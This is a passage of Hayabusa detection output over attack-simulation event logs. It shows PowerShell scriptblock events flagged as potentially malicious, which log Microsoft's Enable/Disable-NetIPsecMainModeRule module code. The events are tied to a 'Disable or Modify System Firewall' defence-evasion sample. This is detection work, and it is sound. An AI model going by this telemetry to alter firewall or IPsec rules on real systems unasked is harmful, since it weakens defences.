[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"isplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and 
(@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDi",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"splayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] 
${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 